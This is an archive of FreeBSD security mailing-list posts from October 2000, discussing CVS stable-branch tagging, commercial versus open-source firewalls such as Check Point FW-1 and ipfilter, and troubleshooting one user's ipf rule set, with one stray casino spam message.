From owner-freebsd-security Sun Oct 8 0:28:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from peach.ocn.ne.jp (peach.ocn.ne.jp [210.145.254.87]) by hub.freebsd.org (Postfix) with ESMTP id 89B6137B66D; Sun, 8 Oct 2000 00:28:22 -0700 (PDT) Received: from newsguy.com (p43-dn02kiryunisiki.gunma.ocn.ne.jp [211.0.245.108]) by peach.ocn.ne.jp (8.9.1a/OCN/) with ESMTP id QAA02446; Sun, 8 Oct 2000 16:28:07 +0900 (JST) Message-ID: <39E021C5.1F5DEE48@newsguy.com> Date: Sun, 08 Oct 2000 16:27:01 +0900 From: "Daniel C. Sobral" X-Mailer: Mozilla 4.7 [en] (Win98; I) X-Accept-Language: en,pt-BR MIME-Version: 1.0 To: "Jeffrey J. Mountin" Cc: Robert Watson , "Matthew D. Fuller" , Jordan Hubbard , John Baldwin , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org Subject: Re: Stable branch References: <4.3.2.20001007161924.00b72460@207.227.119.2> <4.3.2.20001007214506.00bb7c10@207.227.119.2> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jeffrey J. Mountin" wrote: > > One other idea that cropped up would be if we want to set this up for the > more troublesome releases like 3.2 to force them to upgrade to a later > version. Think that only 3.4+ should be considered due to a large enough > install base to consider. Err... we would consider only for 4.2+. This is not something we can go back and do for previous versions without going insane. New model, new versions. -- Daniel C. Sobral (8-DCS) dcs@newsguy.com dcs@freebsd.org capo@linux.bsdconspiracy.net the ants all left because mtn. dew is sold out again To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 0:43:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 55A0537B6A0 for ; Sun, 8 Oct 2000 00:43:43 -0700 (PDT) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id D0A041C69; Sun, 8 Oct 2000 03:43:30 -0400 (EDT) Date: Sun, 8 Oct 2000 03:43:30 -0400 From: Bill Fumerola To: Wes Peters Cc: Gregory Sutter , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 Message-ID: <20001008034330.X38472@jade.chc-chimes.com> References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <39E010FE.8CAA2CB1@softweyr.com>; from wes@softweyr.com on Sun, Oct 08, 2000 at 12:15:26AM -0600 X-Operating-System: FreeBSD 3.3-STABLE i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Oct 08, 2000 at 12:15:26AM -0600, Wes Peters wrote: > Others have mentioned a couple of commercial alternatives; add NetMax and > GnatBox (right?) to this list. Also, be sure to get a copy of my paper > for BSDCon explaining why my company decided to use BSD and ipfilter to > build the firewall of the future on. (Sorry, it's not a corporate firewall > and is not suited for your use.) As long as Wes is plugging his talk, mine will be talking about ipfw and stopping attacks and such. Guido van Rooij is also giving an ipfilter talk I'm looking forward to attending. Firewalls are well represented at this years BSDcon. -- Bill Fumerola - Network Architect, BOFH / Chimes, Inc. billf@chimesnet.com / billf@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 0:44:33 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail2.mia.bellsouth.net (mail2.mia.bellsouth.net [205.152.144.14]) by hub.freebsd.org (Postfix) with ESMTP id 57AD537B503; Sun, 8 Oct 2000 00:44:25 -0700 (PDT) Received: from www.goldendeckcasino.com (adsl-61-143-206.mia.bellsouth.net [208.61.143.206]) by mail2.mia.bellsouth.net (3.3.5alt/0.75.2) with SMTP id DAA10130; Sun, 8 Oct 2000 03:44:21 -0400 (EDT) From: bubblehead32@hotmail.com Message-Id: <200010080744.DAA10130@mail2.mia.bellsouth.net> To: <> Subject: WOW!!! Highest Payouts Around!!!!!!!! Date: Sun, 08 Oct 2000 03:37:59 -0400 X-Sender: bubblehead32@hotmail.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Content-Type: text/plain; charset="us-ascii" X-Priority: 3 X-MSMail-Priority: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Its just like being there. Go to www.goldendeckcasino.com/goldendeckcasino/links/2769.html. If you would like to be removed from these mailings in the future please mailto:bubblehead32@hotmail.com?subject=remove To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 2:34:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from firefly.prairienet.org (firefly.prairienet.org [192.17.3.3]) by hub.freebsd.org (Postfix) with ESMTP id 80EDF37B502 for ; Sun, 8 Oct 2000 02:34:53 -0700 (PDT) Received: from sherman.spotnet (slip-49.prairienet.org [192.17.3.69]) by firefly.prairienet.org (8.9.3/8.9.3) with ESMTP id EAA28165 for ; Sun, 8 Oct 2000 04:34:51 -0500 (CDT) Date: Sun, 8 Oct 2000 04:34:56 -0500 (CDT) From: David Talkington X-Sender: dtalk@sherman.spotnet To: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-Reply-To: <200010080427.PAA19412@cairo.anu.edu.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- >What is really the difference is being able to dial 1-800-FIREWALL and >have someone help you out, etc. >Darren Yeah, I wonder if my (item b) instinct was unfair. David Pick mentioned herein the possibility that the company might not even WANT the expertise to be in-house, and while his scenario was pretty ugly, it suggests a more benign one ... if the company goes with an open-source solution, and you're the only one on staff who knows how to use it, they are then dependent on your talent. Great for you, but bad for them, if turnover is high. At least a purchased solution ensures some kind of support no matter who leaves the company. Your thoughts on this? Seems like a valid concern, and not one that I had considered. (Perhaps I'm naive ... ) - -d - -- David Talkington Prairienet / Community Networking Initiative 217-244-1962 dtalk@prairienet.org PGP Key: http://www.prairienet.org/~dtalk/dt000823.asc -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 Comment: Made with pgp4pine 1.75-6 iQEVAwUBOeA/xb1ZYOtSwT+tAQEDVwf+JUhT2WUwbDEJv0shacEfksTScESJb3rI Wjv61ZeD/bWrac000SIRakmnUROUecSAq86wIRxX7xj/dcRakBX8TpUUxSwwyrWM Pzpy83J4KC81WOvJDS9NUWdJjaagez1edEyyL9PGYGeiBZyglPT4lx/8QsT4GiJl ONVOcYmvflAYkmFKRQmE+zBEOsj/qo/g5+64KzmHlEMI00/4yRHvAa2OzETPlLb3 sFCtChRgnfQBt20cfGTVerykISFvMcL5jQ4Silp7NzWM+qRC7K2BYI77qaRB8Bds tIl3OftUAurg/A23pSWljIybHNFbgV3DPm1bk22oMTfJoTmn4/omVg== =Ms+U -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 3:36:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 9A07F37B66C for ; Sun, 8 Oct 2000 03:36:43 -0700 (PDT) Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id GAA20473; Sun, 8 Oct 2000 06:36:40 -0400 Message-ID: <39E04F14.B3CE226C@allmaui.com> Date: Sun, 08 Oct 2000 03:40:20 -0700 From: Craig Cowen X-Mailer: Mozilla 4.75 [en] (Win95; U) X-Accept-Language: en MIME-Version: 1.0 To: David Talkington Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well I sure have stirred up a topic. Unfortunately, who ever made the point of covering their (The suits) asses by means of accountability, hit the nail on the head. That and not being dependant on me. But I argue on that point that there are many out there who could utilize IPF. More important, if the person who will be administering FW-1 can't, then he/she dosen't know enough about the practice. Opinions, like assholes (and this list proves what I am about to say), everybody has one. Here is mine. NT has no reason on this planet except for people who want to reboot their workstation once a week instead of once a day. As a matter of fact, given the choice between an NT box and a Mac, I would go back to bussing tables. Unix is where it is at, Solaris, BSD, Linux, whatever, there is no equal and there never will be. As for 1-800-helpmeIseebluescreens, they are dummer than the poeple who choose to purchase the product in the first place and have only cheat sheets created by the engineers who know what will fail because the Suits above them had to rush their over priced product to market so that they could go IPO and not under. Just my Opinion/Rant/Frustration Craig David Talkington wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > >What is really the difference is being able to dial 1-800-FIREWALL and > >have someone help you out, etc. > >Darren > > Yeah, I wonder if my (item b) instinct was unfair. David Pick > mentioned herein the possibility that the company might not even WANT > the expertise to be in-house, and while his scenario was pretty ugly, > it suggests a more benign one ... if the company goes with an > open-source solution, and you're the only one on staff who knows how > to use it, they are then dependent on your talent. Great for you, but > bad for them, if turnover is high. At least a purchased solution > ensures some kind of support no matter who leaves the company. > > Your thoughts on this? Seems like a valid concern, and not one that I > had considered. (Perhaps I'm naive ... ) > > - -d > > - -- > David Talkington > Prairienet / Community Networking Initiative > 217-244-1962 > dtalk@prairienet.org > > PGP Key: http://www.prairienet.org/~dtalk/dt000823.asc > > -----BEGIN PGP SIGNATURE----- > Version: PGP 6.5.8 > Comment: Made with pgp4pine 1.75-6 > > iQEVAwUBOeA/xb1ZYOtSwT+tAQEDVwf+JUhT2WUwbDEJv0shacEfksTScESJb3rI > Wjv61ZeD/bWrac000SIRakmnUROUecSAq86wIRxX7xj/dcRakBX8TpUUxSwwyrWM > Pzpy83J4KC81WOvJDS9NUWdJjaagez1edEyyL9PGYGeiBZyglPT4lx/8QsT4GiJl > ONVOcYmvflAYkmFKRQmE+zBEOsj/qo/g5+64KzmHlEMI00/4yRHvAa2OzETPlLb3 > sFCtChRgnfQBt20cfGTVerykISFvMcL5jQ4Silp7NzWM+qRC7K2BYI77qaRB8Bds > tIl3OftUAurg/A23pSWljIybHNFbgV3DPm1bk22oMTfJoTmn4/omVg== > =Ms+U > -----END PGP SIGNATURE----- > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 4:19:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from warning.follo.net (warning.follo.net [195.204.136.30]) by hub.freebsd.org (Postfix) with ESMTP id 765BC37B503; Sun, 8 Oct 2000 04:19:11 -0700 (PDT) Received: (from eivind@localhost) by warning.follo.net (8.9.3/8.9.3) id NAA78889; Sun, 8 Oct 2000 13:19:08 +0200 (CEST) Date: Sun, 8 Oct 2000 13:19:08 +0200 From: Eivind Eklund To: Robert Watson Cc: "Jeffrey J. Mountin" , "Matthew D. Fuller" , Jordan Hubbard , John Baldwin , freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org Subject: Re: Stable branch Message-ID: <20001008131908.B78013@warning.follo.net> References: <4.3.2.20001007214506.00bb7c10@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.4i In-Reply-To: ; from rwatson@FreeBSD.org on Sat, Oct 07, 2000 at 11:36:05PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, Oct 07, 2000 at 11:36:05PM -0400, Robert Watson wrote: > > On Sat, 7 Oct 2000, Jeffrey J. Mountin wrote: > > > Now your earlier proposal makes better sense. At lot more for the > > CVS-meisters to deal with, but they can answer that magic question. > > Also may be an issue to branch old releases, then it might be worth > > doing all the branching at one time and disallowing access. > > Well, at least for the purposes of the release engineer, the major change > is adding a "-b" to the CVS tag operation. However, and important > question, which you raised in a prior e-mail, is whether or not this > places an undue burden on CVS due to expensive branch handling. My hope > is that it would be not, but presumably a CVS meister (Peter?) should > enlighten us. In CVS, the extra load for creating a branch tag instead of a point tag is two bytes per file. However, in order to do this right we should also have a branch point tag. The cost for this is approx 30 bytes per file. I do not think the load on teh cvsup servers will increase problamatically (we'd be able to measure it, but I don't think we'd notice it unless we specifically went looking.) Warner's technique of adding the branch tag for only those files we actually modify would negate the 30-byte cost, but I don't think it is worthwhile. If we want to negate that cost, it'd be better to mod CVS to be able to easily reference the base of a branch tag (as the branch point tag is done to get around problems in the CVS user interface.) Eivind. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 4:21:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.gmx.net (pop.gmx.net [194.221.183.20]) by hub.freebsd.org (Postfix) with SMTP id 01B7637B503 for ; Sun, 8 Oct 2000 04:21:44 -0700 (PDT) Received: (qmail 19769 invoked by uid 0); 8 Oct 2000 11:21:41 -0000 Received: from unknown (HELO speedy.gsinet) (213.21.23.82) by mail.gmx.net with SMTP; 8 Oct 2000 11:21:41 -0000 Received: (from sittig@localhost) by speedy.gsinet (8.8.8/8.8.8) id RAA12972 for freebsd-security@FreeBSD.ORG; Sat, 7 Oct 2000 17:11:53 +0200 Date: Sat, 7 Oct 2000 17:11:53 +0200 From: Gerhard Sittig To: "freebsd-security@FreeBSD.ORG" Subject: Re: Default Deny Message-ID: <20001007171153.P31338@speedy.gsinet> Mail-Followup-To: "freebsd-security@FreeBSD.ORG" References: <200010060056.LAA11152@cairo.anu.edu.au> <39DCC1CB.5FDD7F90@allmaui.com> <20001006204807.M31338@speedy.gsinet> <39DE8D1B.923D86DF@allmaui.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <39DE8D1B.923D86DF@allmaui.com>; from craig@allmaui.com on Fri, Oct 06, 2000 at 07:40:27PM -0700 Organization: System Defenestrators Inc. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ citing Craig Cowen's initial message; I wish one wouldn't have to go to the end just to learn what the answer at the top is about at all, this puts additional (and unnecessary) load on those you want to help you -- it doesn't always work well ] > > > I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my > > > kernel. When using ipnat, I have 'pass in on (private > > > interface) from 192.168.0.0/24 to any keep state' in my > > > rules. [ ... ] I have no rules specified for the public > > > interface. The boxen behind the firewall can surf. On Fri, Oct 06, 2000 at 19:40 -0700, Craig Cowen wrote: > I appreciate your response and your questions. > Yes I did compile and install. > You sound like me talking to my users at work. I guess we all have been through this at least once. I found myself in the past configuring, compiling and installing kernels, even booting them, but not making them the default boot option. Imagine my surprise not recognizing the machine's behaviour after the next boot cycle (a few weeks later) ... :) From what you stated ("I block by default, have only one permissive rule and yet it works") there was no chance to solve the riddle. So you either have to help those you expect to help you with needed information or you will get accused of ignorance and laziness (or get ignored). It's your presentation influencing reactions. :> > ipf -V: > ipf: IP Filter: v3.4.8 (264) > Kernel: IP Filter: v3.4.8 > Running: yes > Log Flags: 0 = none set > Default: block all, Logging: available ^^^^^^^^^ > Active list: 0 That was the important stuff I wanted to make sure. BTW the request to do "ipf -V; ipfstat -in; etc" was meant mainly for yourself (confirming it made its way into ipf code's tables and gets looked up), unless you wanted to publish your setup. To be able to read the rules, one would have to know what's your "private interface" with the "pass in from RFC1918" rule. I guess it's the following block: > hope fully paronoia hasn't ruined this > ipfstat -in > [ ... ] > @13 pass in on dc0 proto tcp from 192.168.1.0/24 to any keep state > @14 pass in on dc0 proto udp from 192.168.1.0/24 to any keep state > @15 pass in on dc0 proto icmp from 192.168.1.0/24 to any keep state These packets make it into the machine, get NATed (the rule for which is missing, here, but shouldn't matter very much) and have to make their way "out into the world". This is done by these rules: > ipfstat -on > > @4 pass out log quick proto tcp from publicinterface/32 to any keep > state #This is necassary to allow me to surf out from my firewall box > @5 pass out log quick proto udp from publicinterface/32 to any keep > state #with these commented out I am still able to surf from inside > @6 pass out log quick proto icmp from publicinterface/32 to any keep > state And since you (or ipf, respectively) keep state, the answers are allowed back in. I don't know what the other rules are meant for. Maybe it should read "from 192.168.1.x/32 to 192.168.1.0/24" to say "let the fw box talk to internal machines". (BTW they seemed to have moved since your last message from the 0.0 net to 1.0 :) > @7 pass out on dc0 proto tcp from 192.168.1.0/24 to 192.168.1.0/24 > @8 pass out on dc0 proto udp from 192.168.1.0/24 to 192.168.1.0/24 > @9 pass out on dc0 proto icmp from 192.168.1.0/24 to 192.168.1.0/24 I guess instead of running some more circles of catching info on the freebsd-security list you might want to search the ipf lists and have a look at the ipftest utility (maybe in reverse order, ipftest is available locally, already). You feed the latter with a description of packets you see as legitimate or to be blocked (e.g. you describe sessions or streams) and the program tells you what it would to to these and why. There are several modes of verbosity and you can even use tcpdump captured descriptions when you don't want to write them yourself. So ipftest lets you drytest and improve your rules based on the sessions you know to need and how they've happened. Look around in /usr/src/contrib/ipfilter and you find more interesting documentation, including many more examples. > I use this to reload my settings after changes > > #!/bin/sh > ipf -D > ipf -Fa -f /etc/ipf.conf -E > ipnat -CF -f /etc/ipnat.conf I would prefer something like ipf -I -Fa -f /etc/ipf.conf -v ( ipf -s; sleep 60; ipf -s; ) & # heavy testing until the prompt returns ipf -s # only when you're happy with what the test showed This will make you recognize syntactic mistakes at load time without the preceding flush for the active ruleset and works even at remote machines and still leaves you in a working state in case you broke your rule set (logical errors in content a parser cannot tell you about). It's the advantage of having two swappable rule sets, make use of it! And I wouldn't give the -F option to ipnat as well as I wouldn't give -E to ipf when it's about *reloading* -- see the manpages for details. Even for initial setup -E will be wrong in case you made ipfilter integral part of your kernel and not a module (when you block by default, I assume you don't make ipf a module -- it's about minimizing or even eliminating windows of vulnerability). *plug* PR conf/20202 (rc hooks for ipf) made it into -CURRENT yesterday and has to prove to be complete, correct and stable. I invite ipf users to test it and provide feedback in good and bad directions. When the patch survives one month in -CURRENT, it could hopefully make it into 4.2R (scheduled for mid November IIRC) or start another cycle of improvement in case it misses something or turns out to be dangerous. :) > [ ... deleted the fullquote ... ] virtually yours 82D1 9B9C 01DC 4FB4 D7B4 61BE 3F49 4F77 72DE DA76 Gerhard Sittig true | mail -s "get gpg key" Gerhard.Sittig@gmx.net -- If you don't understand or are scared by any of the above ask your parents or an adult to help you. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 5:14:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id 23D9737B502 for ; Sun, 8 Oct 2000 05:14:38 -0700 (PDT) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id HAA22114; Sun, 8 Oct 2000 07:14:37 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-67.max1.wa.cyberlynk.net(207.227.118.67) by peak.mountin.net via smap (V1.3) id sma022112; Sun Oct 8 07:14:12 2000 Message-Id: <4.3.2.20001008070308.00b9ae90@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Sun, 08 Oct 2000 07:13:17 -0500 To: David Talkington , "freebsd-security@FreeBSD.ORG" From: "Jeffrey J. Mountin" Subject: Re: Check Point FW-1 In-Reply-To: References: <200010080427.PAA19412@cairo.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 04:34 AM 10/8/00 -0500, David Talkington wrote: >Yeah, I wonder if my (item b) instinct was unfair. David Pick >mentioned herein the possibility that the company might not even WANT >the expertise to be in-house, and while his scenario was pretty ugly, >it suggests a more benign one ... if the company goes with an >open-source solution, and you're the only one on staff who knows how >to use it, they are then dependent on your talent. Great for you, but >bad for them, if turnover is high. At least a purchased solution >ensures some kind of support no matter who leaves the company. > >Your thoughts on this? Seems like a valid concern, and not one that I >had considered. (Perhaps I'm naive ... ) That is why they should require documentation. Your peers, if any, should be able to follow it and fill in at need. Another reason why they may not wish to go with "in-house" talent is the idea to out source. Companies do this so they don't have to pay for a full-time employee or reallocate internal resources for projects. In some cases it is worthwhile. Other times it's an endless black hole. Can only blame the suits for taking this idea too far at times. Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 8:49:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id DC03E37B503 for ; Sun, 8 Oct 2000 08:49:25 -0700 (PDT) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA05947; Sun, 8 Oct 2000 11:48:44 -0400 (EDT) (envelope-from wollman) Date: Sun, 8 Oct 2000 11:48:44 -0400 (EDT) From: Garrett Wollman Message-Id: <200010081548.LAA05947@khavrinen.lcs.mit.edu> To: Darren Reed Cc: freebsd-security@FreeBSD.ORG (freebsd-security@FreeBSD.ORG) Subject: Re: Check Point FW-1 In-Reply-To: <200010080427.PAA19412@cairo.anu.edu.au> References: <200010080427.PAA19412@cairo.anu.edu.au> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > For the record, you can't sue anyone who's got the "standard" software > license/disclaimer over the failure of it to perform or be bug free. > Read it one day and actually see what it's all about. Um, yes and no. It varies from jurisdiction to jurisdiction. Here in Massachusetts, there is no legally valid waiver of the right to sue, and implied warranties are difficult to disclaim. I do not know, however, whether anyone has tested this relative to a commercial software license before -- but there is a reason most licenses which include a warranty clause say something like ``this warranty gives you specific legal rights, and you may have other rights which vary from jurisdiction to jursidiction.'' -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 9:17:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id D755037B502 for ; Sun, 8 Oct 2000 09:17:24 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id JAA06928; Sun, 8 Oct 2000 09:14:43 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda06922; Sun Oct 8 09:14:33 2000 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.0/8.9.1) id e98GEHH10548; Sun, 8 Oct 2000 09:14:17 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdO10546; Sun Oct 8 09:14:15 2000 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.0/8.9.1) id e98GEBC13248; Sun, 8 Oct 2000 09:14:11 -0700 (PDT) Message-Id: <200010081614.e98GEBC13248@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdC13229; Sun Oct 8 09:13:57 2000 X-Mailer: exmh version 2.1.1 10/15/1999 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 4.1.1-RELEASE X-Sender: cy To: Wes Peters Cc: Darren Reed , David Talkington , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 In-reply-to: Your message of "Sat, 07 Oct 2000 22:45:30 MDT." <39DFFBE9.546DFE24@softweyr.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sun, 08 Oct 2000 09:13:55 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <39DFFBE9.546DFE24@softweyr.com>, Wes Peters writes: > Darren Reed wrote: > > > > In some mail from David Talkington, sie said: > > > > > > b) To a boss concerned about the bottom line, a purchase equals > > > accountability (e.g., someone to sue when it breaks). This is (in my > > > humble opinion) typical of management that doesn't really care about > > > security of the company's data per se, but just wants their personal > > > asses covered. > > > > For the record, you can't sue anyone who's got the "standard" software > > license/disclaimer over the failure of it to perform or be bug free. > > Read it one day and actually see what it's all about. > > But you can threaten to stop paying them tens of thousands of dollars in > customer/technical non-support contract fees if they don't come up with > a fix real fast. On the flip side, the vendor can raise the price of licensing and support, then you're stuck. Take a look at Oracle's new pricing. Time to buy Oracle stock at least for the short term :) Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/DEC Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 9:26:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 8FF3B37B502 for ; Sun, 8 Oct 2000 09:26:10 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13iJQh-0000WK-00; Sun, 08 Oct 2000 10:36:03 -0600 Message-ID: <39E0A273.E2243C9A@softweyr.com> Date: Sun, 08 Oct 2000 10:36:03 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Bill Fumerola Cc: Gregory Sutter , Craig Cowen , "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: <39DEBB51.E51BACFB@allmaui.com> <20001006230628.L23587@klapaucius.zer0.org> <39E010FE.8CAA2CB1@softweyr.com> <20001008034330.X38472@jade.chc-chimes.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Bill Fumerola wrote: > > On Sun, Oct 08, 2000 at 12:15:26AM -0600, Wes Peters wrote: > > > Others have mentioned a couple of commercial alternatives; add NetMax and > > GnatBox (right?) to this list. Also, be sure to get a copy of my paper > > for BSDCon explaining why my company decided to use BSD and ipfilter to > > build the firewall of the future on. (Sorry, it's not a corporate firewall > > and is not suited for your use.) > > As long as Wes is plugging his talk, mine will be talking about ipfw and stopping > attacks and such. Guido van Rooij is also giving an ipfilter talk I'm looking > forward to attending. Firewalls are well represented at this years BSDcon. Sorry, Bill, I should've mentioned your talk and Guido's. I presented mine as a refutation of the orinal writer's "the bosses want to go with a commercial solution". This is going to be a great Con, and surprise surprise security is THE hot topic this year. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 8 9:30: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 06DA537B503 for ; Sun, 8 Oct 2000 09:29:56 -0700 (PDT) Received: from localhost ([127.0.0.1] helo=softweyr.com ident=Fools trust ident!) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 13iJVD-0000WX-00; Sun, 08 Oct 2000 10:40:43 -0600 Message-ID: <39E0A38B.728C3C50@softweyr.com> Date: Sun, 08 Oct 2000 10:40:43 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: David Talkington Cc: "freebsd-security@FreeBSD.ORG" Subject: Re: Check Point FW-1 References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David Talkington wrote: > > -----BEGIN PGP SIGNED MESSAGE----- > > >What is really the difference is being able to dial 1-800-FIREWALL and > >have someone help you out, etc. > >Darren > > Yeah, I wonder if my (item b) instinct was unfair. David Pick > mentioned herein the possibility that the company might not even WANT > the expertise to be in-house, and while his scenario was pretty ugly, > it suggests a more benign one ... if the company goes with an > open-source solution, and you're the only one on staff who knows how > to use it, they are then dependent on your talent. Great for you, but > bad for them, if turnover is high. At least a purchased solution > ensures some kind of support no matter who leaves the company. > > Your thoughts on this? Seems like a valid concern, and not one that I > had considered. (Perhaps I'm naive ... ) This sounds like an excellent opportunity to sell them on the open source route, then parlay it into a consulting business. ;^) It is a viable concern from the business standpoint. A part of the problem is the insistence of short-sighted businesses in not having two-deep training on essential technologies. Contracting an outside firm is supposed to gain this two- (or more) deep support, with only the staffing costs that you actually need. Perhaps you could find a local firm that provides such consulting as a backup, and pay the small fee to keep them up to date on your configuration so they can take over, at least temporarily, if you get hit by a bus. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC 